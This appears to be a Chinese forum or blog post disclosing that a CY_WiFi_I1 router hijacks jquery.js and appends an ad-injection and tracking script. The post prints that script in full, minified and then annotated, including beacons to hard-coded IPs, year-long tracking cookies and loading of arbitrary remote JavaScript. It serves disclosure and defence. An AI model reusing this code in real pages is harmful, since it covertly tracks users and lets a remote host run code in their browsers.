
触云爱路由劫持网页投放广告,劫持jquery.js


出现网页劫持的这台触云爱路由信息如下:
固件型号 CY_WiFi_I1
固件版本 1.26.2 (201608221622)

其他版本的不清楚。

具体表现为:只要网页里引用了jquery.js,该请求就会被重定向到劫持网站,并在原先的jquery.js后面追加一行广告/恶意代码。(具体代码见下面)

比如访问http://www.ptent.net/wp-content/themes/ptent/js/jquery.js
就被重定向到http://110.92.64.70:9001/api/js/?link=/rd/www.ptent.net/wp-content/themes/ptent/js/jquery.js?tid=%2205ca52154c1a%22&rid=%2222c0c0bea425%22

被增加的内容如下:

// Captured payload exactly as it was appended to the proxied jquery.js
// (minified). It is the same script as the formatted listing further below,
// which carries the per-function analysis notes. The line breaks inside it
// here (after "var " and inside the "expires=" string literal) appear to be
// paste artefacts of this page, not part of the injected code.
;!function(win){var c={log_url:"http://110.92.64.67:6010",ad_url:"http://110.92.64.70:9003",cookie_url:"http://110.92.64.70/get/cookie/",is_log:true,is_decode:true,domain:document.domain.substring(document.domain.indexOf(".")+1,document.domain.length),get_ad:function(){var iframes=document.getElementsByTagName("IFRAME");if(iframes.length<1){return[]}var i=0,domain=document.location.protocol+"//"+document.location.host,property={},adx=[],doc=null;for(i;i<iframes.length;i++){property=[];doc=iframes[i];if(doc.style.visibility!="hidden"&&typeof doc.src!=="undefined"&&doc.src!==""){if(doc.src.indexOf("http")<0||doc.src.indexOf(domain)==0){continue}property.push("s="+encodeURIComponent(doc.src));property.push("i="+(typeof doc.id!=="undefined"?doc.id:""));property.push("w="+doc.offsetWidth);property.push("h="+doc.offsetHeight);property.push("l="+doc.offsetLeft);property.push("tp="+doc.offsetTop);adx.push(property)}}return adx},is_mobile:function(){var e=navigator.userAgent;return !!e.match(/AppleWebKit.*Mobile.*/)||"ontouchstart" in document.documentElement},client:function(){var l=[],b=window.document.body;l.push("url="+encodeURIComponent(document.location.href));l.push("t="+encodeURIComponent(document.title));l.push("sl="+b.scrollWidth);l.push("sh="+b.scrollHeight);return l},image:function(url,callback){var img=new Image;img.src=url;if(typeof callback==="function"){img.onload=function(){callback()}}return img},get_ads:function(){var ads=this.get_ad();if(ads!=""){var ad="",i=0,counts=ads.length,client=this.client().join("&"),val="";for(i;i<counts;i++){ad=ads[i].join("&");this.image(this.log_url+"/api/v1/p/?"+client+"&"+ad)}}},init:function(){var u=document.currentScript.getAttribute("u"),ur=document.currentScript.getAttribute("src"),tid=e.cookie("wf_tid"),rid=e.cookie("wf_rid");if(typeof u!==undefined&&u!==null&&u.indexOf("|")>-1){var 
p=u.split("|");tid=p[0];rid=p[1];e.load(tid,rid)}else{if(ur.indexOf("?u=")>-1&&ur.indexOf("|")>-1){ur=ur.substring(ur.indexOf("?u=")+3,ur.length);var p=ur.split("|");tid=p[0];rid=p[1];e.load(tid,rid)}else{if(tid==null||rid==null){e.load_js(this.cookie_url,function(d){var dm=document.domain.substring(document.domain.indexOf(".")+1,document.domain.length);if(d.tid!=null&&d.tid!=""){e.cookie("wf_tid",d.tid,365,dm)}if(d.rid!=null&&d.rid!=""){e.cookie("wf_rid",d.rid,365,dm)}e.load(d.tid,d.rid)},true)}else{e.load(tid,rid)}}}if(this.is_log){this.get_ads()}}};var e={is_load:function(){if(self.frameElement&&self.frameElement.tagName=="IFRAME"||window.frames.length!=parent.frames.length||self!=top||document.location.href.indexOf(".gov.cn")>-1){return false}return true},load_js:function(url,callback,is_json,charset){var _doc=document.getElementsByTagName("head")[0],js=document.createElement("script"),cf="jQ"+new Date().getTime()+""+Math.floor(Math.random()*10),n=null;if(typeof callback==="undefined"){callback=function(){}}if(typeof charset==="undefined"){charset="utf-8"}if(typeof is_json!=="undefined"&&is_json==true){eval(cf+"= function(msg) {return "+callback+"(msg);};");url+=(url.indexOf("?")>-1?"&":"?")+"callback="+cf}js.setAttribute("charset",charset);js.setAttribute("type","text/javascript");js.setAttribute("src",url);_doc.appendChild(js);if(typeof js.onload!=="undefined"){js.onload=function(){if(!is_json){callback()}n=js.parentNode;if(n){n.removeChild(js)}}}else{js.onreadystatechange=function(){if(js.readyState=="loaded"||js.readyState=="complete"){js.onreadystatechange=null;if(!is_json){callback&&callback()}n=js.parentNode;if(n){n.removeChild(js)}}}}return false},cookie:function(name,value,day,domain){if(arguments.length==1){var a=document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));if(a!=null){return decodeURIComponent(a[2])}return null}else{if(!arguments[1]){document.cookie=name+"=0; path=/"+((domain)?"; domain="+domain:"")+"; expires=Fri, 02-Jan-1970 
00:00:00 GMT"}else{var e=new Date;if(!day){e.setTime(e.getTime()+24*60*60*1000)}else{e.setTime(e.getTime()+day*24*60*60*1000)}e="; expires="+e.toGMTString();document.cookie=name+"="+value+e+"; path=/"+((domain)?";domain="+domain:"")}}},decode:function(code){var a=[],d=[],k="",m=[],c="";for(var i=0;i<6;i++){k=code.charAt(i*2)+""+code.charAt(i*2+1);a.push(parseInt(k,16))}d[0]=a[0]>>6|a[5]<<2;d[1]=a[1]>>6|a[4]<<2;d[2]=a[2]>>6|a[3]<<2;d[3]=a[3]>>6|a[2]<<2;d[4]=a[4]>>6|a[1]<<2;d[5]=a[5]>>6|a[0]<<2;for(var j=0;j<6;j++){c=(d[j]&255).toString(16);if(c.length==1){c="0"+c}m.push(c)}return m.join("")},load:function(rid,tid){if(rid||tid){rid=decodeURI(rid).replace(/"/g,"");tid=decodeURI(tid).replace(/"/g,"");if(c.is_decode){rid=this.decode(rid);tid=this.decode(tid)}}var url=c.ad_url+"/api/v1/get_ad/?uri="+encodeURIComponent(document.location.href)+"&title="+encodeURIComponent(document.title)+"&rid="+rid+"&tid="+tid+"&plat="+(c.is_mobile()?"m":"pc")+"&ref="+encodeURIComponent(document.referrer);e.load_js(url,function(msg){if(msg!==null&&msg!==""&&msg.url!==""){win._cadx.load_js(msg.url)}},true)}};var cy_adx=function(){if(e.is_load()){c.init()}};win._cadx=e;cy_adx()}(window);

以下是格式化后的代码:

/*
 * Analysis notes (defender's view) on the script the router appends to proxied
 * copies of jquery.js. Execution flow:
 *   cy_adx() -> e.is_load() gate -> c.init() -> e.load() -> JSONP request to
 *   c.ad_url -> the returned msg.url is inserted as a plain <script>, i.e. the
 *   remote host can run arbitrary JavaScript in every page that passed through
 *   the router.
 * In parallel, c.get_ads() beacons the src/size/position of every third-party
 * <iframe> on the page to c.log_url together with the page URL and title.
 *
 * Indicators visible in this code: hosts 110.92.64.67:6010 and 110.92.64.70
 * (port 9003 and path /get/cookie/), endpoints /api/v1/p/ and /api/v1/get_ad/,
 * cookies wf_tid / wf_rid, the global window._cadx, JSONP callback names of the
 * form jQ<ms-timestamp><digit>, and a <script> "u" attribute or "?u=" query
 * carrying "<tid>|<rid>".
 *
 * NOTE: the formatting step dropped the leading ";!" of the minified original,
 * so as shown this anonymous function is not a valid standalone statement.
 */
function(win) {
    // Configuration plus the page-side collectors.
    var c = {
        log_url: "http://110.92.64.67:6010",           // receives the iframe beacons (get_ads)
        ad_url: "http://110.92.64.70:9003",            // returns the script URL to inject (load)
        cookie_url: "http://110.92.64.70/get/cookie/", // hands out tid/rid when no cookie exists (init)
        is_log: true,                                  // run get_ads() after init()
        is_decode: true,                               // pass tid/rid through decode() before use
        // document.domain with its first label removed (constructed example:
        // "www.example.com" -> "example.com").
        domain: document.domain.substring(document.domain.indexOf(".") + 1, document.domain.length),
        // Collects every visible <iframe> whose src is http(s) and not served
        // from this page's own scheme+host: src, id, size and offset.
        // Returns an array of "key=value" string arrays, one per iframe.
        get_ad: function() {
            var iframes = document.getElementsByTagName("IFRAME");
            if (iframes.length < 1) {
                return []
            }
            var i = 0,
            domain = document.location.protocol + "//" + document.location.host, // this page's origin prefix
            property = {}, // reassigned to an array at the top of each iteration
            adx = [],
            doc = null;
            for (i; i < iframes.length; i++) {
                property = [];
                doc = iframes[i];
                if (doc.style.visibility != "hidden" && typeof doc.src !== "undefined" && doc.src !== "") {
                    // Skip non-http sources and frames from this page's own origin.
                    if (doc.src.indexOf("http") < 0 || doc.src.indexOf(domain) == 0) {
                        continue
                    }
                    property.push("s=" + encodeURIComponent(doc.src));
                    property.push("i=" + (typeof doc.id !== "undefined" ? doc.id: ""));
                    property.push("w=" + doc.offsetWidth);
                    property.push("h=" + doc.offsetHeight);
                    property.push("l=" + doc.offsetLeft);
                    property.push("tp=" + doc.offsetTop);
                    adx.push(property)
                }
            }
            return adx
        },
        // Mobile detection: WebKit "Mobile" user agent or touch-event support.
        is_mobile: function() {
            var e = navigator.userAgent;
            return !! e.match(/AppleWebKit.*Mobile.*/) || "ontouchstart" in document.documentElement
        },
        // Page fingerprint sent with every beacon: URL, title, body scroll size.
        client: function() {
            var l = [],
            b = window.document.body;
            l.push("url=" + encodeURIComponent(document.location.href));
            l.push("t=" + encodeURIComponent(document.title));
            l.push("sl=" + b.scrollWidth);
            l.push("sh=" + b.scrollHeight);
            return l
        },
        // Fire-and-forget GET beacon through an Image object that is never
        // attached to the DOM; optional callback runs on load.
        image: function(url, callback) {
            var img = new Image;
            img.src = url;
            if (typeof callback === "function") {
                img.onload = function() {
                    callback()
                }
            }
            return img
        },
        // One beacon to log_url per iframe returned by get_ad(), each carrying
        // the client() fields plus that iframe's fields. The loose `ads != ""`
        // test relies on an empty array coercing to "" (no beacons when nothing
        // matched).
        get_ads: function() {
            var ads = this.get_ad();
            if (ads != "") {
                var ad = "",
                i = 0,
                counts = ads.length,
                client = this.client().join("&"),
                val = ""; // unused
                for (i; i < counts; i++) {
                    ad = ads[i].join("&");
                    this.image(this.log_url + "/api/v1/p/?" + client + "&" + ad)
                }
            }
        },
        // Resolves the tracking ids (tid, rid) and hands them to e.load():
        //   1. from the injected <script>'s "u" attribute ("tid|rid"),
        //   2. else from a "?u=tid|rid" suffix of its src,
        //   3. else from the wf_tid / wf_rid cookies; when either is missing
        //      they are fetched via JSONP from cookie_url and stored for 365
        //      days on the parent domain before load() is called.
        // Afterwards reports third-party iframes when is_log is set.
        // `typeof u !== undefined` compares a string with undefined and is
        // therefore always true; only the `u !== null` check is effective.
        // e.load is declared as load(rid, tid) but every call here passes
        // (tid, rid), so the two ids travel under swapped names in the URL.
        init: function() {
            var u = document.currentScript.getAttribute("u"),
            ur = document.currentScript.getAttribute("src"),
            tid = e.cookie("wf_tid"),
            rid = e.cookie("wf_rid");
            if (typeof u !== undefined && u !== null && u.indexOf("|") > -1) {
                var p = u.split("|");
                tid = p[0];
                rid = p[1];
                e.load(tid, rid)
            } else {
                if (ur.indexOf("?u=") > -1 && ur.indexOf("|") > -1) {
                    ur = ur.substring(ur.indexOf("?u=") + 3, ur.length);
                    var p = ur.split("|");
                    tid = p[0];
                    rid = p[1];
                    e.load(tid, rid)
                } else {
                    if (tid == null || rid == null) {
                        e.load_js(this.cookie_url,
                        function(d) {
                            // JSONP callback: persist the server-issued ids, then load.
                            var dm = document.domain.substring(document.domain.indexOf(".") + 1, document.domain.length);
                            if (d.tid != null && d.tid != "") {
                                e.cookie("wf_tid", d.tid, 365, dm)
                            }
                            if (d.rid != null && d.rid != "") {
                                e.cookie("wf_rid", d.rid, 365, dm)
                            }
                            e.load(d.tid, d.rid)
                        },
                        true)
                    } else {
                        e.load(tid, rid)
                    }
                }
            }
            if (this.is_log) {
                this.get_ads()
            }
        }
    };
    // Loader / cookie helpers; also exported as window._cadx.
    var e = {
        // Gate: only run in a top-level document (not inside any frame) and
        // never on URLs containing ".gov.cn".
        is_load: function() {
            if (self.frameElement && self.frameElement.tagName == "IFRAME" || window.frames.length != parent.frames.length || self != top || document.location.href.indexOf(".gov.cn") > -1) {
                return false
            }
            return true
        },
        // Inserts <script src=url> into <head> and removes it once loaded.
        // With is_json set it becomes a JSONP request: a global function named
        // "jQ<timestamp><digit>" is created through eval() around the source
        // text of `callback`, and "callback=<name>" is appended to the URL so
        // the server's response invokes it. Either way the response body runs
        // as script in the page, so the remote host controls what executes.
        // The onreadystatechange branch is presumably for browsers without
        // script onload (not verifiable from here).
        load_js: function(url, callback, is_json, charset) {
            var _doc = document.getElementsByTagName("head")[0],
            js = document.createElement("script"),
            cf = "jQ" + new Date().getTime() + "" + Math.floor(Math.random() * 10), // JSONP callback name
            n = null;
            if (typeof callback === "undefined") {
                callback = function() {}
            }
            if (typeof charset === "undefined") {
                charset = "utf-8"
            }
            if (typeof is_json !== "undefined" && is_json == true) {
                eval(cf + "= function(msg) {return " + callback + "(msg);};");
                url += (url.indexOf("?") > -1 ? "&": "?") + "callback=" + cf
            }
            js.setAttribute("charset", charset);
            js.setAttribute("type", "text/javascript");
            js.setAttribute("src", url);
            _doc.appendChild(js);
            if (typeof js.onload !== "undefined") {
                js.onload = function() {
                    // For JSONP the response itself calls the callback, not onload.
                    if (!is_json) {
                        callback()
                    }
                    n = js.parentNode;
                    if (n) {
                        n.removeChild(js)
                    }
                }
            } else {
                js.onreadystatechange = function() {
                    if (js.readyState == "loaded" || js.readyState == "complete") {
                        js.onreadystatechange = null;
                        if (!is_json) {
                            callback && callback()
                        }
                        n = js.parentNode;
                        if (n) {
                            n.removeChild(js)
                        }
                    }
                }
            }
            return false
        },
        // Cookie helper dispatched on arguments.length:
        //   cookie(name)                     -> decoded value, or null if absent
        //   cookie(name, <falsy>)            -> delete (expires in 1970)
        //   cookie(name, value, day, domain) -> set for `day` days (default 1)
        // `name` is interpolated into a RegExp unescaped; only the fixed names
        // wf_tid / wf_rid are used in this script.
        cookie: function(name, value, day, domain) {
            if (arguments.length == 1) {
                var a = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
                if (a != null) {
                    return decodeURIComponent(a[2])
                }
                return null
            } else {
                if (!arguments[1]) {
                    document.cookie = name + "=0; path=/" + ((domain) ? "; domain=" + domain: "") + "; expires=Fri, 02-Jan-1970 00:00:00 GMT"
                } else {
                    var e = new Date;
                    if (!day) {
                        e.setTime(e.getTime() + 24 * 60 * 60 * 1000)
                    } else {
                        e.setTime(e.getTime() + day * 24 * 60 * 60 * 1000)
                    }
                    e = "; expires=" + e.toGMTString();
                    document.cookie = name + "=" + value + e + "; path=/" + ((domain) ? ";domain=" + domain: "")
                }
            }
        },
        // Bit-shuffle of a 12-hex-char id (6 bytes): output byte i keeps the top
        // 2 bits of input byte i and the low 6 bits of input byte 5-i, so the 48
        // bits are only rearranged, not encrypted. Returns 12 lowercase hex chars.
        decode: function(code) {
            var a = [],
            d = [],
            k = "",
            m = [],
            c = "";
            for (var i = 0; i < 6; i++) {
                k = code.charAt(i * 2) + "" + code.charAt(i * 2 + 1);
                a.push(parseInt(k, 16))
            }
            d[0] = a[0] >> 6 | a[5] << 2;
            d[1] = a[1] >> 6 | a[4] << 2;
            d[2] = a[2] >> 6 | a[3] << 2;
            d[3] = a[3] >> 6 | a[2] << 2;
            d[4] = a[4] >> 6 | a[1] << 2;
            d[5] = a[5] >> 6 | a[0] << 2;
            for (var j = 0; j < 6; j++) {
                c = (d[j] & 255).toString(16);
                if (c.length == 1) {
                    c = "0" + c
                }
                m.push(c)
            }
            return m.join("")
        },
        // Requests the ad payload: URL-decodes the ids and strips double quotes
        // (the redirect URL on this page carries them as %22...%22), optionally
        // decode()s them, then JSONP-calls ad_url/api/v1/get_ad/ with page URL,
        // title, ids, platform and referrer. If the response object has a
        // non-empty url, that URL is loaded as a plain script (no JSONP), i.e.
        // executed in the page.
        load: function(rid, tid) {
            if (rid || tid) {
                rid = decodeURI(rid).replace(/"/g, "");
                tid = decodeURI(tid).replace(/"/g, "");
                if (c.is_decode) {
                    rid = this.decode(rid);
                    tid = this.decode(tid)
                }
            }
            var url = c.ad_url + "/api/v1/get_ad/?uri=" + encodeURIComponent(document.location.href) + "&title=" + encodeURIComponent(document.title) + "&rid=" + rid + "&tid=" + tid + "&plat=" + (c.is_mobile() ? "m": "pc") + "&ref=" + encodeURIComponent(document.referrer);
            e.load_js(url,
            function(msg) {
                if (msg !== null && msg !== "" && msg.url !== "") {
                    win._cadx.load_js(msg.url)
                }
            },
            true)
        }
    };
    // Entry point: run init() only when the is_load() gate allows it.
    var cy_adx = function() {
        if (e.is_load()) {
            c.init()
        }
    };
    win._cadx = e; // exposes the helpers globally; used by load()'s callback
    cy_adx()
} (window);

看到这两个香港的服务器ip得小心了。
110.92.64.67
110.92.64.70

我也仅仅是初步发现了这一点问题;如果继续挖掘,窃取敏感信息/密码都是可能的,例如cookie这类数据是轻而易举就能拿到的,毕竟上网的数据都经过该路由器。

没想到触云爱路由会如此无耻,不要脸到如此地步也没谁了。

解决办法是刷其他路由器的固件,目前我刷的是如意云的固件,网页被劫持情况消失。

